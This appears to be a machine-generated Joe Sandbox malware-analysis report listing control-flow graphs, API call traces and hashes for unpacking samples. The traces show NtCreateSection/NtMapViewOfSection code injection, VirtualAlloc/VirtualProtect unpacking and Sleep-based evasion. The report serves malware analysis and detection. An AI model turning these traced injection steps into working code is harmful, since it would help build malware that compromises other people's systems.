                                                                                                                                              control_flow_graph 493 4018f1-40194b call 401193 Sleep call 40141f 503 40195a-4019a5 call 401193 493->503 504 40194d-401955 call 401514 493->504 504->503
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007105F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_70d000_wideaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction ID: 05a5d8fe60bf6968835a1a2227664a0498a28b66049bddd7a88b3a89095f9049
                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction Fuzzy Hash: F2113F79A00208EFDB01DF98C985E98BBF5EF08351F058094F9489B361D375EA90DF90
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                                              APIs
                                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00511CE4,00416AC7), ref: 004164A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                              • Opcode ID: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
                                                                                                                                              • Instruction ID: 0e1443596e4cadc07de741eab66e71947b5663c851de1fa4f156f6081f94fab8
                                                                                                                                              • Opcode Fuzzy Hash: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
                                                                                                                                              • Instruction Fuzzy Hash: 95B092B41896009BD2008BB0AD04BD03AA4A318302F008191F700C51A0DA201808AF1C
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 0041678E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
                                                                                                                                              • Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
                                                                                                                                              • Opcode Fuzzy Hash: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
                                                                                                                                              • Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:28.6%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:168
                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                              execution_graph 4519 403043 4520 40319a 4519->4520 4521 40306d 4519->4521 4521->4520 4522 403128 RtlCreateUserThread NtTerminateProcess 4521->4522 4522->4520 4589 4014cf 4590 4014d3 4589->4590 4591 401660 NtDuplicateObject 4590->4591 4600 401571 4590->4600 4592 40167d NtCreateSection 4591->4592 4591->4600 4593 4016a3 NtMapViewOfSection 4592->4593 4594 4016fd NtCreateSection 4592->4594 4593->4594 4595 4016c6 NtMapViewOfSection 4593->4595 4596 401729 4594->4596 4594->4600 4595->4594 4597 4016e4 4595->4597 4598 401733 NtMapViewOfSection 4596->4598 4596->4600 4597->4594 4599 40175a NtMapViewOfSection 4598->4599 4598->4600 4599->4600 4563 2160005 4568 216092b GetPEB 4563->4568 4565 2160030 4570 216003c 4565->4570 4569 2160972 4568->4569 4569->4565 4571 2160049 4570->4571 4572 2160e0f 2 API calls 4571->4572 4573 2160223 4572->4573 4574 2160d90 GetPEB 4573->4574 4575 2160238 VirtualAlloc 4574->4575 4576 2160265 4575->4576 4577 21602ce VirtualProtect 4576->4577 4579 216030b 4577->4579 4578 2160439 VirtualFree 4582 21604be LoadLibraryA 4578->4582 4579->4578 4581 21608c7 4582->4581 4690 4015d5 4691 4015e4 4690->4691 4692 401660 NtDuplicateObject 4691->4692 4701 40177c 4691->4701 4693 40167d NtCreateSection 4692->4693 4692->4701 4694 4016a3 NtMapViewOfSection 4693->4694 4695 4016fd NtCreateSection 4693->4695 4694->4695 4696 4016c6 NtMapViewOfSection 4694->4696 4697 401729 4695->4697 4695->4701 4696->4695 4698 4016e4 4696->4698 4699 401733 NtMapViewOfSection 4697->4699 4697->4701 4698->4695 4700 40175a NtMapViewOfSection 4699->4700 4699->4701 4700->4701 4523 402f16 4524 402f1a 4523->4524 4526 402fa2 4524->4526 4527 401991 4524->4527 4528 4019a0 4527->4528 4529 4019d8 Sleep 4528->4529 4531 4019f3 4529->4531 4532 4014c4 4529->4532 4531->4526 4534 4014d3 4532->4534 4533 401571 4533->4531 4534->4533 4535 401660 NtDuplicateObject 4534->4535 4535->4533 4536 40167d NtCreateSection 4535->4536 4537 4016a3 NtMapViewOfSection 4536->4537 4538 4016fd NtCreateSection 4536->4538 4537->4538 4539 4016c6 NtMapViewOfSection 4537->4539 4538->4533 4540 401729 4538->4540 4539->4538 4541 4016e4 4539->4541 4540->4533 4542 401733 NtMapViewOfSection 4540->4542 4541->4538 4542->4533 4543 40175a NtMapViewOfSection 4542->4543 4543->4533 4702 416dd7 4703 416de0 4702->4703 4704 416da0 SetPriorityClass 4703->4704 4705 416dfb 4703->4705 4704->4703 4583 2160001 4584 2160005 4583->4584 4585 216092b GetPEB 4584->4585 4586 2160030 4585->4586 4587 216003c 7 API calls 4586->4587 4588 2160038 4587->4588 4661 402e9a 4662 402e5f 4661->4662 4663 402eaf 4661->4663 4664 402fa2 4663->4664 4665 401991 8 API calls 4663->4665 4665->4664 4449 78ff58 4450 78ff67 4449->4450 4453 7906f8 4450->4453 4454 790713 4453->4454 4455 79071c CreateToolhelp32Snapshot 4454->4455 4456 790738 Module32First 4454->4456 4455->4454 4455->4456 4457 78ff70 4456->4457 4458 790747 4456->4458 4460 7903b7 4458->4460 4461 7903e2 4460->4461 4462 79042b 4461->4462 4463 7903f3 VirtualAlloc 4461->4463 4462->4462 4463->4462 4613 402ee7 4615 402ef9 4613->4615 4614 402fa2 4615->4614 4616 401991 8 API calls 4615->4616 4616->4614 4730 4171e6 4731 4171f0 LoadLibraryW 4730->4731 4740 416bd0 GetModuleHandleW GetProcAddress VirtualProtect 4731->4740 4734 41721d 4735 416e20 8 API calls 4734->4735 4736 417222 4735->4736 4737 417263 InterlockedDecrement 4736->4737 4738 417243 MoveFileA 4736->4738 4739 417279 4736->4739 4737->4736 4738->4736 4740->4734 4753 4019a9 4754 4019a0 4753->4754 4755 4019d8 Sleep 4754->4755 4756 4014c4 7 API calls 4755->4756 4757 4019f3 4755->4757 4756->4757 4544 216003c 4545 2160049 4544->4545 4557 2160e0f SetErrorMode SetErrorMode 4545->4557 4550 2160265 4551 21602ce VirtualProtect 4550->4551 4553 216030b 4551->4553 4552 2160439 VirtualFree 4556 21604be LoadLibraryA 4552->4556 4553->4552 4555 21608c7 4556->4555 4558 2160223 4557->4558 4559 2160d90 4558->4559 4560 2160dad 4559->4560 4561 2160dbb GetPEB 4560->4561 4562 2160238 VirtualAlloc 4560->4562 4561->4562 4562->4550 4464 4172f0 4467 416ec0 4464->4467 4466 4172f5 4468 416ecd 4467->4468 4469 4170df 4468->4469 4470 416fcf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4468->4470 4471 4170f0 SetCommState 4469->4471 4477 417109 4469->4477 4472 417017 7 API calls 4470->4472 4471->4469 4473 4170c0 4472->4473 4474 4170b4 ObjectPrivilegeAuditAlarmA 4472->4474 4475 4170d0 4473->4475 4476 4170c9 ReleaseMutex 4473->4476 4474->4473 4475->4469 4476->4475 4478 4171c2 4477->4478 4479 417116 8 API calls 4477->4479 4492 416ba0 LocalAlloc 4478->4492 4490 417193 4479->4490 4483 4171c7 LoadLibraryW 4493 416bd0 GetModuleHandleW GetProcAddress VirtualProtect 4483->4493 4484 41721d 4494 416e20 4484->4494 4486 417239 MoveFileA 4487 417222 4486->4487 4487->4486 4488 417263 InterlockedDecrement 4487->4488 4491 417279 4487->4491 4488->4487 4490->4478 4491->4466 4492->4483 4493->4484 4495 416e49 QueryDosDeviceA 4494->4495 4496 416e5a 4494->4496 4495->4496 4505 416d70 4496->4505 4499 416e75 4508 416db0 4499->4508 4500 416e6d FreeEnvironmentStringsW 4500->4499 4503 416ea3 4503->4487 4504 416e8c HeapDestroy GetNumaProcessorNode 4504->4503 4506 416d81 FatalAppExitA GetModuleHandleW 4505->4506 4507 416d93 4505->4507 4506->4507 4507->4499 4507->4500 4509 416dc3 BuildCommDCBA 4508->4509 4512 416dcf 4508->4512 4509->4512 4510 416dfb 4510->4503 4510->4504 4512->4510 4513 416da0 4512->4513 4516 416d20 4513->4516 4517 416d4b 4516->4517 4518 416d3c SetPriorityClass 4516->4518 4517->4512 4518->4517 4666 401975 4667 401979 4666->4667 4668 4014c4 7 API calls 4667->4668 4669 4019f3 4668->4669

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 416ec0-416ee8 2 416ef0-416ef7 0->2 3 416f24-416f2a 2->3 4 416ef9-416f20 2->4 5 416f2c-416f38 3->5 6 416f3e-416f48 3->6 4->3 5->6 7 416f83-416f8a 6->7 8 416f4a-416f79 6->8 7->2 9 416f90-416f96 7->9 8->7 11 416f98-416f9e 9->11 12 416fa0-416fa6 11->12 13 416fac-416fb3 11->13 12->13 14 416fb5 13->14 15 416fb9-416fc0 13->15 14->15 15->11 16 416fc2-416fc9 15->16 17 4170df-4170ed 16->17 18 416fcf-4170b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4170f0-4170fe SetCommState 17->19 21 4170c0-4170c7 18->21 22 4170b4-4170ba ObjectPrivilegeAuditAlarmA 18->22 26 417100-417107 19->26 27 417109-417110 19->27 24 4170d0-4170dc 21->24 25 4170c9-4170ca ReleaseMutex 21->25 22->21 24->17 25->24 26->19 26->27 28 4171c2-4171d1 call 416ba0 27->28 29 417116-4171bc GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameW GetCommTimeouts 27->29 34 4171d3-4171e4 28->34 35 41720d-417218 LoadLibraryW call 416bd0 28->35 29->28 37 4171f0-417200 34->37 42 41721d-41722e call 416e20 35->42 40 417202 37->40 41 417208-41720b 37->41 40->41 41->35 41->37 47 417230-417237 42->47 48 417239-417247 MoveFileA 47->48 49 41724d-417253 47->49 48->49 51 417255 call 416bc0 49->51 52 41725a-417261 49->52 51->52 54 417270-417277 52->54 55 417263-41726a InterlockedDecrement 52->55 54->47 57 417279-417289 54->57 55->54 59 417290-4172a0 57->59 61 4172a2 59->61 62 4172a9-4172ac 59->62 61->62 62->59 64 4172ae-4172b9 62->64 65 4172c0-4172c5 64->65 66 4172c7-4172cd 65->66 67 4172cf-4172d5 65->67 66->67 68 4172d7-4172e4 66->68 67->65 67->68
                                                                                                                                              APIs
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
                                                                                                                                              • GetFocus.USER32 ref: 00416FE0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00416FF4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00417048
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004170CA
                                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004170F4
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00417139
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00417140
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
                                                                                                                                              • GetBinaryType.KERNEL32(0041934C,?), ref: 00417158
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
                                                                                                                                              • GetLongPathNameW.KERNEL32(00419360,?,00000000), ref: 0041717E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
                                                                                                                                              • LoadLibraryW.KERNELBASE(00419374), ref: 00417212
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 4079765171-956986773
                                                                                                                                              • Opcode ID: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
                                                                                                                                              • Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
                                                                                                                                              • Opcode Fuzzy Hash: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
                                                                                                                                              • Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 155 4014c4-4014f6 161 4014f9-40150d call 401240 155->161 166 401512-401513 161->166 167 401544-401545 166->167 168 401515-401528 166->168 170 401547 167->170 171 4015bd-4015d4 167->171 168->161 169 40152a-401535 168->169 169->166 173 401537-401543 169->173 174 401596-4015a6 170->174 175 401549-40154b 170->175 173->167 177 4015a8 174->177 175->177 178 40154d-40156d 175->178 180 4015e7-40160a call 401240 178->180 181 40156f 178->181 189 40160c 180->189 190 40160f-401614 180->190 184 401571 181->184 185 4015e2-4015e3 181->185 185->180 189->190 192 40161a-40162b 190->192 193 40193e-401946 190->193 196 401631-40165a 192->196 197 40193c 192->197 193->190 198 40194b-40198e call 401240 193->198 196->197 205 401660-401677 NtDuplicateObject 196->205 197->198 205->197 207 40167d-4016a1 NtCreateSection 205->207 210 4016a3-4016c4 NtMapViewOfSection 207->210 211 4016fd-401723 NtCreateSection 207->211 210->211 213 4016c6-4016e2 NtMapViewOfSection 210->213 211->197 214 401729-40172d 211->214 213->211 216 4016e4-4016fa 213->216 214->197 217 401733-401754 NtMapViewOfSection 214->217 216->211 217->197 219 40175a-401776 NtMapViewOfSection 217->219 219->197 220 40177c 219->220 220->197 223 40177c call 401781 220->223 223->197
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
                                                                                                                                              • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                                              • Opcode Fuzzy Hash: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
                                                                                                                                              • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 224 4015d5-4015e4 226 4015f4 224->226 227 4015eb-4015f0 224->227 226->227 228 4015f7-40160a call 401240 226->228 227->228 231 40160c 228->231 232 40160f-401614 228->232 231->232 234 40161a-40162b 232->234 235 40193e-401946 232->235 238 401631-40165a 234->238 239 40193c 234->239 235->232 240 40194b-40198e call 401240 235->240 238->239 247 401660-401677 NtDuplicateObject 238->247 239->240 247->239 249 40167d-4016a1 NtCreateSection 247->249 252 4016a3-4016c4 NtMapViewOfSection 249->252 253 4016fd-401723 NtCreateSection 249->253 252->253 255 4016c6-4016e2 NtMapViewOfSection 252->255 253->239 256 401729-40172d 253->256 255->253 258 4016e4-4016fa 255->258 256->239 259 401733-401754 NtMapViewOfSection 256->259 258->253 259->239 261 40175a-401776 NtMapViewOfSection 259->261 261->239 262 40177c 261->262 262->239 265 40177c call 401781 262->265 265->239
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
                                                                                                                                              • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                                              • Opcode Fuzzy Hash: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
                                                                                                                                              • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 266 4015df-4015e4 268 4015f4 266->268 269 4015eb-4015f0 266->269 268->269 270 4015f7-40160a call 401240 268->270 269->270 273 40160c 270->273 274 40160f-401614 270->274 273->274 276 40161a-40162b 274->276 277 40193e-401946 274->277 280 401631-40165a 276->280 281 40193c 276->281 277->274 282 40194b-40198e call 401240 277->282 280->281 289 401660-401677 NtDuplicateObject 280->289 281->282 289->281 291 40167d-4016a1 NtCreateSection 289->291 294 4016a3-4016c4 NtMapViewOfSection 291->294 295 4016fd-401723 NtCreateSection 291->295 294->295 297 4016c6-4016e2 NtMapViewOfSection 294->297 295->281 298 401729-40172d 295->298 297->295 300 4016e4-4016fa 297->300 298->281 301 401733-401754 NtMapViewOfSection 298->301 300->295 301->281 303 40175a-401776 NtMapViewOfSection 301->303 303->281 304 40177c 303->304 304->281 307 40177c call 401781 304->307 307->281
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
                                                                                                                                              • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                                              • Opcode Fuzzy Hash: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
                                                                                                                                              • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 308 4015f2-4015f4 310 4015f7-40160a call 401240 308->310 311 4015eb-4015f0 308->311 314 40160c 310->314 315 40160f-401614 310->315 311->310 314->315 317 40161a-40162b 315->317 318 40193e-401946 315->318 321 401631-40165a 317->321 322 40193c 317->322 318->315 323 40194b-40198e call 401240 318->323 321->322 330 401660-401677 NtDuplicateObject 321->330 322->323 330->322 332 40167d-4016a1 NtCreateSection 330->332 335 4016a3-4016c4 NtMapViewOfSection 332->335 336 4016fd-401723 NtCreateSection 332->336 335->336 338 4016c6-4016e2 NtMapViewOfSection 335->338 336->322 339 401729-40172d 336->339 338->336 341 4016e4-4016fa 338->341 339->322 342 401733-401754 NtMapViewOfSection 339->342 341->336 342->322 344 40175a-401776 NtMapViewOfSection 342->344 344->322 345 40177c 344->345 345->322 348 40177c call 401781 345->348 348->322
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
